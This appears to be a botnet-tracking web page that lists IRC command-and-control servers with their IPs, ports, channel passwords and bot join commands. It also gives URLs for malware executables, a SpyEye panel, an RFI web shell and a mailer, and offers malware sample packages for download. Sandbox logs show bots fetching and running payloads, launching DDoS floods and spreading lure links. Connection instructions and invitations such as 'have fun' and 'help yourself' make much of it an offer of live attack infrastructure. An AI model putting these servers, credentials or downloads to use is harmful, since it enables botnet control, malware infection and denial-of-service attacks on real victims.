Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it is a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.

I'm not certain of what your criteria is for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activities and it should be closed as soon as possible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

88.86.113.239(irc botnet hosted in Czech Republic Liberec Supernetwork S.r.o)

Remote Host Port Number
88.86.113.239 31092

NICK US|computername
USER siruyuse UNIX UNIX :username
JOIN #global#
JOIN #US

Now talking in #global#
Topic On: [ #global# ] [ omtECZWQgee3/7w9aGStOwmHmYQVTJXFx68dXRhkVWUhNomgeVieycdUnnRaoait ]
Modes On: [ #global# ] [ +smntMu ]

hosting infos:
http://whois.domaintools.com/88.86.113.239

117.211.84.155(irc botnet hosted in India Bangalore O/o Dgm Bb Noc Bsnl Bangalore)

Remote Host Port Number
117.211.84.155 25343 PASS scary

NICK [USA|XP|XmWCMYN5]
USER 9583 "" "lol" :9583
NICK [USA|XP|UFdwiY47]
USER 4508 "" "lol" :4508
NICK [USA|XP|YZw7cS8u]
USER 2152 "" "lol" :2152
NICK [USA|XP|X2XUcWQU]
NICK [USA|XP|cuCVirAD]
USER 6242 "" "lol" :6242
NICK [USA|XP|bx3Iivi3]
USER 8840 "" "lol" :8840
NICK [USA|XP|fRQNcpmq]
USER 6294 "" "lol" :6294

hosting infos
http://whois.domaintools.com/117.211.84.155

204.15.252.199(irc botnet hosted in United States Henderson Trashy Media)

UPDATE:
204.15.252.199:4042

IRC traffic:
NICK new[BEL|XP|Pig-D17A7D27]dvxotgy
USER hh "" "lol" :hh

Now talking in #newbiz#
Topic On: [ #newbiz# ] [ .down /99/106/112/81/55/59/40/125/111/122/35/108/114/121/114/116/115/106/104/122/126/121/37/69/76/117/48/113/107/125/118/126/47/108/116/84/47/102/113/71/ ]
Topic By: [ b ]
Topic: b sets topic []

hosting infos:
http://whois.domaintools.com/204.15.252.199

89.238.176.123(irc botnet hosted in United Kingdom M247 Ltd)

Remote Host Port Number
195.122.131.11 80
213.251.170.52 80
64.62.243.91 80
89.238.176.123 4042 IRCD here

Now talking in #newbiz#
Topic On: [ #newbiz# ] [ ]
Topic By: [ b ]

hosting infos:
http://whois.domaintools.com/89.238.176.123

gusan0.sin-ip.es(irc botnet hosted in United States Chicago Fdcservers.net)

Remote Host Port Number
50.7.247.10 6667

NICK NEW[XX][XP]8744609838
USER 8744 "" "TsGh" :8744
MODE NEW[XX][XP]8744609838 -d
JOIN ##spam##
PONG :irc.priv8net.com

NICK {XP\USA\698507}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XP\USA\698507} -ix
JOIN ##v5##
MODE ##v5## -ix
PRIVMSG ##v5## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds
PRIVMSG ##v5## :.::[DDoS]::. Done with flood (0KB/sec).
NICK {XP\USA\965601}
MODE {XP\USA\965601} -ix



hosting infos:
http://whois.domaintools.com/50.7.247.10

46.17.100.229(irc botnet hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number
46.17.100.229 4443 ircd here
46.28.64.99 444
46.28.64.99 80
79.142.67.113 80

NICK N[USA|XP][vsdyciq]
USER vsdy "" "lol" :vsdy
JOIN #b0ts
PONG 422
PRIVMSG #b0ts :[Download]: Succeeded using primary method [WinInet: 279 KB]

executables:
# http://c0re.us/test.exe
# http://waterforpeople.co.cc/crypted.exe

Spyeye panel:
http://quantummechanic.cc/controlpanel/
Spyeye executable:
http://waterforpeople.co.cc/spyfud.exe.exe

hosting info:
http://whois.domaintools.com/46.17.100.229

213.229.107.27(irc botnet hosted in United Kingdom Canonical Range For Bs2-hp1-le)

Remote Host Port Number
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
85.118.137.12 80
213.229.107.27 1234 PASS xxx

NICK NEW-[USA|00|P|07451]
USER XP-1167 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|07451] -ix
JOIN #!nn! test
PONG 22 MOTD

hosting infos:
http://whois.domaintools.com/213.229.107.27

67.210.170.142(irc botnet hosted in Canada Ottawa Network Defence Intelligence Inc)

Remote Host Port Number
67.210.170.142 20000 PASS ohai

NICK cqexck
USER nnlucf "" "ftr" :nnlucf

hosting infos:
http://whois.domaintools.com/67.210.170.142

75.102.22.20(irc botnet hosted in United States Chicago Hostforweb Inc)

Remote Host Port Number
75.102.22.20 2345

NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD

hosting infos:
http://whois.domaintools.com/75.102.22.20

64.202.107.28(irc botnet hosted in United States Chicago Hostforweb Inc)

Remote Host Port Number
64.202.107.28 2345

NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD

hosting infos:
http://whois.domaintools.com/64.202.107.28

72.20.14.87(irc botnet hosted in United States Staminus Communications)

Remote Host Port Number
72.20.14.87 38

JOIN #Internet#

hosting infos:
http://whois.domaintools.com/72.20.14.87

70.107.249.167(irc botnet hosted in United States New York Verizon Online Llc)

70.107.249.167:3921
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: "xvvv mssql 100 0 0 -a -r -s"

I got this info from Seb, another botnet lover lol

hosting infos:
http://whois.domaintools.com/70.107.249.167

smellypussy.info(ngrBot very large irc botnet hosted in United States Henderson Trashy Media)

This botnet is a very big one, and the bot used for spreading is also special: it has a lot of features, like injection into multiple system processes, ruskill for killing processes, blocking AV updates and Windows security updates, MSN spread, FTP infection, etc.

The sample was captured by Xylitol, and then I helped find more IPs and different samples from the same botnet.

The bot is detected as Dorkbot

Here we go


Analysis from sample:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj

Dns used for the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]

Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]

Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]


How to connect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81

UPDATE:
Remote Host Port Number
204.15.252.199 49287 ircd here
208.75.230.43 80
213.251.170.52 80
61.31.99.67 4042 ircd here


Channel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol

NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422


Channel pass: ngrBot

The bin is for sale on underground forums for 400$ but you can have it for free now

brainbox.dyndns.org(irc botnet hosted in United States Sparta Ispsystem At Nac)

Remote Host Port Number
213.186.33.87 80
82.146.51.173 4598


NICK n[XP-USA]855437
PONG 422
PRIVMSG ##Channel## :
09Executed Process Successfully.
USER 8554 "" "TsGh" :8554
JOIN ##Channel3##
PRIVMSG ##Channel3## :
NICK [XP-USA]561757
USER 5617 "" "TsGh" :5617
JOIN ##Channel##


hosting infos:
http://whois.domaintools.com/82.146.51.173

72.55.132.187(irc botnet hosted in Canada Zenkis.ca)

Remote Host Port Number
213.251.170.52 80
72.55.132.187 2603 PASS ngrBot
78.47.10.199 21

NICK n{US|XPa}hjcbvjl
USER hjcbvjl 0 0 :hjcbvjl
JOIN #phcrulez ngrBot
USER adi

hosting infos:
http://whois.domaintools.com/72.55.132.187

infected34.co.cc(irc botnet hosted in Germany Berlin Fast It Colocation)

ircd :infected34.co.cc:6667 PASS timu or PASS aliss

NICK [00|USA|989169]
USER XP-6593 * 0 :COMPUTERNAME
MODE [00|USA|989169] -ix
JOIN #N timu

MODE [SI|USA|00|P|79102] -ix
JOIN #test# aliss
PONG 217.79.190.39
NICK [SI|USA|00|P|79102]
USER XP-4584 * 0 :COMPUTERNAME


hosting infos:
http://whois.domaintools.com/217.79.190.39

75.102.22.40(irc botnet hosted in United States Chicago Hostforweb Inc)

Remote Host Port Number
195.122.131.8 80
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
66.220.158.11 80
75.102.22.40 2866 PASS xxx


NICK NEW-[USA|00|P|20798]
USER XP-0727 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|20798] -ix
JOIN #!nine! test
PONG 22 MOTD

hosting infos:
http://whois.domaintools.com/75.102.22.40

50mb malware samples

This is another package with different malware
have fun
size=50mb



Download:
http://c65cdb0b.tubeviral.com

toxfeenyxx.sdeirc.net(phoenix bot hosted in Cyprus C & C Advanced Online Services Ltd)

Remote Host Port Number
toxfeenyxx.sdeirc.net 3674

NICK N[USA|XP][tjxcvay]
USER tjxc "" "lol" :tjxc
JOIN #phoenix selling9309239
NICK N[USA|XP][baersyl]
USER baer "" "lol" :baer


hosting infos:
http://whois.domaintools.com/46.243.8.142

homelessman.weedns.com(Mouse's botnet hosted in the whole world lol)

This is probably one of the biggest botnets, still alive after years now

dns:homelessman.weedns.com
port:3305

Resolved : [homelessman.weedns.com] To [80.247.72.130]
Resolved : [homelessman.weedns.com] To [92.62.231.115]
Resolved : [homelessman.weedns.com] To [202.117.53.21]
Resolved : [homelessman.weedns.com] To [156.26.121.177]

DNS List:

NICK P|hy4m13g8c
USER kv7ucu7y9 * 0 :USA|XP|601
USERHOST P|hy4m13g8c
MODE P|hy4m13g8c
JOIN #mm RSA
PRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0puSW4.pimDm1LRefR1ZyBMf0vZEvo.KMXSW1c0M3m/Fwv310uA.y6/SUz0u/OGWL5.gwJqI.6pkc9.kty0t0KWEjq.nHZN20/qQ08.asyjW/qqA8J1QcT5G1

ashland.aboutkiddies.com(irc botnet hosted in United States New York Webair Internet Development Company Inc)

Remote Host Port Number
209.200.50.75 3800 PASS hax0r
213.251.170.52 80
91.200.241.40 80

* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://91.200.241.40/dq.exe


PRIVMSG #dpi :[d="http://91.200.241.40/dq.exe" s="23552 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0


PASS hax0r..KCIK
00000010 | 206E 7B55 537C 5850 617D 6D69 696D 6567 | n{US|XPa}miimeg
00000020 | 740D 0A52 5353 5220 6D69 696D 6567 7420 | t..RSSR miimegt
00000030 | 3020 3020 3A6D 6969 6D65 6774 0D0A 5345 | 0 0 :miimegt..SE
00000040 | 4E44 2023 6E67 206E 6730 300D 0A | ND #ng ng00..

hosting infos:
http://whois.domaintools.com/209.200.50.75

46.243.8.119(irc botnet hosted in Cyprus C & C Advanced Online Services Ltd)

Remote Host Port Number
ircserver.taylor412gang.com 3941

NICK N[USA|XP][qhfpagj]
USER qhfp "" "lol" :qhfp
JOIN #apple apple57

hosting infos:
http://whois.domaintools.com/46.243.8.119

01.cybernix.info(irc botnet hosted in United States Willowbrook Psinet Inc)

Remote Host Port Number
01.cybernix.info 1750 PASS gsaxx00

NICK \00\USA\9j6m6dbn0n
USER XP-SP2 x x :COMPUTERNAME
JOIN ##pool P00L
NICK \00\USA\iky784di69


hosting infos:
http://whois.domaintools.com/154.35.64.32

95.173.179.231(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)

Remote Host Port Number
95.173.179.231 6667 PASS codr00t

MODE [USA|XP|094124] -ix
JOIN #k codr00t
PRIVMSG #k :[p2p]: Spreading to p2p folders.
PONG HTTP1.4
NICK [USA|XP|094124]
USER xfgbxix * 0 :COMPUTERNAME

hosting infos:
http://whois.domaintools.com/95.173.179.231

main.xxxxxiseviumixxxxx.info(irc botnet hosted in Germany Berlin Active Media)

Remote Host Port Number
jky.no-ip.info 3177 RAT here
main.xxxxxiseviumixxxxx.info 3211 IRCD here

NICK Sapphire{USA|XP-SP2}0300311
USER 03003114 "" "03003114" :03003114
MODE Sapphire{USA|XP-SP2}0300311
JOIN #Sapphire_2#
NICK New{USA|XP-SP2}1046453
USER 10464537 "" "10464537" :10464537
MODE New{USA|XP-SP2}1046453


hosting infos:
http://whois.domaintools.com/88.198.219.113

yesim.hoodrich.ru(irc botnet hosted in United States South Lake Tahoe Reliablehosting.com - Network Services)

Remote Host Port Number
yesim.hoodrich.ru:4042
Resolved : [yesim.hoodrich.ru] To [216.131.127.13]
216.131.127.13 4042
89.201.164.126 80

NICK new[USA|XP|COMPUTERNAME]pethrmn
USER xD "" "lol" :xD
JOIN #biznew#
PONG 422
PONG :irc.priv8net4.com

* The data identified by the following URL was then requested from the remote web server:
o http://epicbookings.com/images/jun16.exe


hosting infos:
http://whois.domaintools.com/216.131.127.13

kayits.byinter.net(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)

found by tr0j3n

Remote Host Port Number
kayits.byinter.net 7107

NICK new[iRooT-XP-USA]667657
USER 3221 "" "TsGh" :3221
JOIN #!MSN! Coded
NICK [iRooT-XP-USA]008675
USER 0086 "" "TsGh" :0086
NICK [iRooT-XP-USA]049882
USER 0498 "" "TsGh" :0498


hosting infos:
http://whois.domaintools.com/94.102.1.163

qeshmjaa.zapto.org(desperate albanian hecker hosting botnet in Ireland Dublin Digiweb Ltd)

Remote Host Port Number
qeshmjaa.zapto.org 4244

NICK [iRooT-XP-USA]211081
USER 2110 "" "TsGh" :2110
JOIN #gan# sk
NICK new[iRooT-XP-USA]709534
USER 7095 "" "TsGh" :7095
NICK [iRooT-XP-USA]664288
USER 6642 "" "TsGh" :6642

hosting infos:
http://whois.domaintools.com/78.137.159.84

22mb malware samples

size 22mb
different malware samples inside
have fun reversing



Download:
http://8efc580b.tubeviral.com

tinker.weedns.com(irc botnet Mouse's net again)

Remote Host Port Number
tinker.weedns.com 3305 PASS secretpass

Resolved : [tinker.weedns.com] To [173.9.72.212]
Resolved : [tinker.weedns.com] To [222.124.178.155]
Resolved : [tinker.weedns.com] To [66.238.151.86]
Resolved : [tinker.weedns.com] To [188.165.200.48]
Resolved : [tinker.weedns.com] To [74.210.208.163]

NICK yf69xrls6
USER rb6c2qqku * 0 :USA|XP|115

JOIN #mm RSA
Topic On: [ #mm ] [ +yOfS7/ZgRdB.u97R71RybXB/ubyOC/gLWja.029Cg1ae4NB/TcaF4.m9cnf/dRE2M0IU0Az0JjgIw/Pu691.6bET91ANj0U. ]

193.107.16.111(irc botnet hosted in Seychelles Ideal Solution Ltd)

Remote Host Port Number
193.107.16.111 7654 PASS ngrBot
213.251.170.52 80
66.45.255.234 80

NICK n{US|XPa}cucqohu
USER cucqohu 0 0 :cucqohu
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://gloimpsa.com/js/expressInstall.swf.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe" - Download retries: 0

hosting infos:
http://whois.domaintools.com/193.107.16.111

91.215.159.137(irc botnet hosted in Netherlands Amsterdam Infinite Technologies Internet Solutions Limited)

Remote Host Port Number
112.78.8.20 80
195.122.131.3 80
213.251.170.52 80
91.215.159.137 1866 PASS ngrBot

PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/2997295683/nap.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}aytockz
USER aytockz 0 0 :aytockz
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-r9k5w9_JPG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-u9v2e9_JPG"


hosting infos:
http://whois.domaintools.com/91.215.159.137

c0re.su(irc botnet hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number
c0re.su 4443

NICK N[USA|XP][yiowryo]
USER yiow "" "lol" :yiow
JOIN #b0ts
NICK N[USA|XP][uuobuyk]
USER uuob "" "lol" :uuob

NICK [USA-XP][ftlizjn]
USER 2844 "" "TsGh" :2844
JOIN #botz
NICK [USA-XP][qirnfam]
USER 9143 "" "TsGh" :9143
NICK [n][USA-XP][ihcnykp]
USER 2550 "" "TsGh" :2550

hosting infos:
http://whois.domaintools.com/46.17.100.229

92.241.165.115(irc botnet hosted in Russian Federation Oao Webalta)

Remote Host Port Number
213.251.170.52 80
92.241.165.115 1863 PASS ngrBot

NICK n{US|XPa}qgaqcrq
USER qgaqcrq 0 0 :qgaqcrq
JOIN #start romeo

Now talking in #start
Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ]
Topic By: [ ecu ]

hosting infos:
http://whois.domaintools.com/92.241.164.67

115.239.230.73(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host Port Number
115.239.230.73 6943 PASS laorosr
213.251.170.52 80
31.184.237.43 80
98.126.35.112 80

MODE [N00_USA_XP_1295223]
@ -ix


hosting infos:
http://whois.domaintools.com/115.239.230.73

42mb malware samples

This package has a lot of RATs and banking trojans inside
have fun

Download:
http://c3266cfc.tubeviral.com

irc.raidzone.net(irc botnet hosted in United States Lansing Liquid Web Inc)

50.28.21.18:8890
Nick: New|AUT|1244036|XP
Username: 7665336
Joined Channel: #pedophiliac with Password YDARIO

Remote Host Port Number
50.28.21.18 7659 PASS fuck

NICK [3151|USA|XP|Z3R0x]
USER 3151 "" "lol" :3151
JOIN #pedophiliac YDARIO
PONG 422

hosting infos:
http://whois.domaintools.com/50.28.21.18

209.172.59.146(ngrBot hosted in Canada Toronto Iweb Technologies Inc)

Remote Host Port Number
209.172.59.146 5794 PASS ngrBot

213.251.170.52 80

74.53.197.4 80

NICK n{US|XPa}pvcbajf
USER pvcbajf 0 0 :pvcbajf
JOIN #butowski ngrBot
PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) - Redirected 15 domain(s)

The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://conectaamor.com/_server/editor/images/dominios.txt

EXE File:
http://conectaamor.com/_server/editor/images/fudnew2.exe

RFI SHELL:
http://conectaamor.com/_server/editor/images/lang.php find the passwd your self

Mailer:
http://conectaamor.com/_server/editor/images/mailer.php help yourself lol

hosting infos:
http://whois.domaintools.com/209.172.59.146

ziggy.no-ip.org(botnet hosted in Canada Frantech Solutions)

Remote Host Port Number
205.185.122.148 6667 PASS nickz23
205.185.122.148 80

NICK {NEW}[USA][XP-SP2]976017
USER 4242 "" "lol" :4242
PONG :D78F0ECE
JOIN #bots

* The data identified by the following URL was then requested from the remote web server:
o http://ziggy.no-ip.org/lsass.exe


hosting infos:
http://whois.domaintools.com/205.185.122.148

jskd6c.jumpingcrab.com(ngrBot hosted in Panama Eric Szopa)

Looks like ngrBot, the reptile mod made by fubar and jam3s, is spreading a lot

Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]

Remote Host Port Number
184.107.143.126 2009 and 6667 PASS ngrBot
213.251.170.52 80
70.85.227.66 80

PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"
PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira :D bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"


* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
o http://www.befordsouthpointford.com/bfam/llllllllll.EXE

Crypter used to protect the bot:
C:\Users\M4x\Documents\Programmieren\PECRYPT\Client\EXECUTABLE\Loader_Stub\Release\Loader_Stub.pdb

Detection:
2/41 on VirusTotal


hosting infos:
http://whois.domaintools.com/184.107.143.126

212.7.214.39(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)

Remote Host Port Number
195.122.131.9 80
212.7.214.16 80
213.251.170.52 80
212.7.214.39 1866 PASS ngrBot

PRIVMSG #!hot! :[DNS]: Blocked 1269 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/3581947473/jamesbond.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}gshmhma
USER gshmhma 0 0 :gshmhma
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "oh you gotta see this lol http://www.baitbook.net/facebook-profile-pic-9292-JPEG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://www.baitbook.net/facebook-profile-pic-1531-JPEG"


* The data identified by the following URLs was then requested from the remote web server:
o http://rapidshare.com/files/3581947473/jamesbond.exe
o http://212.7.214.16/list.txt
o http://api.wipmania.com/


hosting infos:
http://whois.domaintools.com/212.7.214.39

193.106.172.131(ngrBot hosted in Russian Federation Moscow Iqhost Ltd)

Remote Host Port Number
193.106.172.131 1863 PASS ngrBot
213.251.170.52 80

NICK n{US|XPa}hvjyted
USER hvjyted 0 0 :hvjyted
JOIN #80t35ref 1963.g3rb3rs1t0.3691

hosting infos:
http://whois.domaintools.com/193.106.172.131

12mb malware samples

Mostly botnets and banking trojans
have fun

Download:
http://e422237e.tubeviral.com

Worm.Win32.FFAuto.uy

Exe file:
http://123back.com/1.EXE

Java drive by:
http://123back.com/

* The following Host Names were requested from a host database:
o sam.chatsmate.com
o ms.tvchatz.com
o chatsmate.com
o justchatz.com
o tvchatz.com

UDP Connections
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3001 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0

Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Reads HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman"

File Changes by all processes
New Files \Device\RasAcd
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Opened Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
\\.\PIPE\lsarpc
Deleted Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Chronological Order Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Copy File: c:\1.EXE to C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)

hosting infos:
http://whois.domaintools.com/173.248.136.153

91.211.117.46(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)

Remote Host Port Number
213.251.170.52 80
91.211.117.81 80
91.211.117.46 1865 PASS ngrBot

NICK n{US|XPa}ruzgvfp
USER ruzgvfp 0 0 :ruzgvfp
JOIN #main 4m3r1k4
QUIT :rebooting

Now talking in #main
Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ]
Topic By: [ RamzGallagher ]

hosting infos:
http://whois.domaintools.com/91.211.117.46

bozoo.no-ip.biz

bozoo.no-ip.biz 94.120.148.91
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963

Registry Changes by all processes
Create or Open
Changes HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "mstwain32" = C:\WINDOWS\mstwain32.exe


File Changes by all processes
New Files c:\tripeks.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\ntdtcstp.dll
C:\WINDOWS\cmsetac.dll
\Device\RasAcd
Deleted Files
Chronological Order Create/Open File: c:\tripeks.exe (OPEN_ALWAYS)
Find File: c:\tripeks.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\tripeks.exe to C:\WINDOWS\mstwain32.exe
Find File: C:\WINDOWS\*.*
